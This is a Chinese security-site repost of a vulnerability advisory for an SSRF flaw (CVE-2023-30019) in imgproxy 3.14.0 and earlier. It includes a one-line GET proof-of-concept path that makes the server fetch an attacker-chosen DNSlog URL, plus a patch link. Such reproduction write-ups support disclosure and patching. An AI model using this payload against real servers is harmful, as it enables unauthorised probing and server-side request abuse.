Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】

admin

137999
文章

113
评论

2024年8月19日23:25:02评论42 views字数 491阅读1分38秒阅读模式

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】

0x01漏洞介绍

imgproxy是imgproxy个人开发者的用于调整和转换远程镜像的快速且安全的独立服务器。

imgproxy 3.14.0版本及之前版本存在安全漏洞，由于缺乏对 imageURL 参数的清理，容易受到服务器端请求伪造 (SSRF) 的攻击。

0x02影响版本

imgproxy <=3.14.0

Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】

0x03漏洞复现

1.访问漏洞环境

Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】

2.对漏洞进行复现

POC （GET）

 /111/rs:fit:400:400:0:0/plain/http://dvxrhi.dnslog.cn

漏洞复现

GET请求，ndslog测试存在漏洞

Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】

3.nuclei测试（漏洞存在）

Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】

0x04修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://github.com/imgproxy/imgproxy/commit/1a9768a2c682e88820064aa3d9a05ea234ff3cc4

原文始发于微信公众号（弥天安全实验室）：Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

金华迪加现场大屏互动系统ajax_act_set_bgmusic.php接口存在SQL注入漏洞

漏洞预警百卓smart querysql.php sql注入

用友 GRP-U8-SelectDMJE.jsp存在SQL注入漏洞

pgAdmin 远程代码执行漏洞（CVE-2025-2945）

Crushftp 认证绕过漏洞（CVE-2025-2825）

Crushftp存在未授权访问漏洞CVE-2025-2825 附POC

WVP-GB28181摄像头管理平台存在弱口令

Emlog index.php接口的存在SQL注入漏洞附POC

GLPI SQL注入漏洞（CVE-2025-24799）

华磊科技物流系统modifyInsurance存在sql注入漏洞 POC

本文由 admin 发表于 2024年8月19日23:25:02
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】https://cn-sec.com/archives/1999135.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】

金华迪加现场大屏互动系统ajax_act_set_bgmusic.php接口存在SQL注入漏洞

漏洞预警百卓smart querysql.php sql注入

用友 GRP-U8-SelectDMJE.jsp存在SQL注入漏洞

pgAdmin 远程代码执行漏洞（CVE-2025-2945）

Crushftp 认证绕过漏洞（CVE-2025-2825）

Crushftp存在未授权访问漏洞CVE-2025-2825 附POC

WVP-GB28181摄像头管理平台存在弱口令

Emlog index.php接口的存在SQL注入漏洞附POC

GLPI SQL注入漏洞（CVE-2025-24799）

华磊科技物流系统modifyInsurance存在sql注入漏洞 POC

发表评论

在线咨询

微信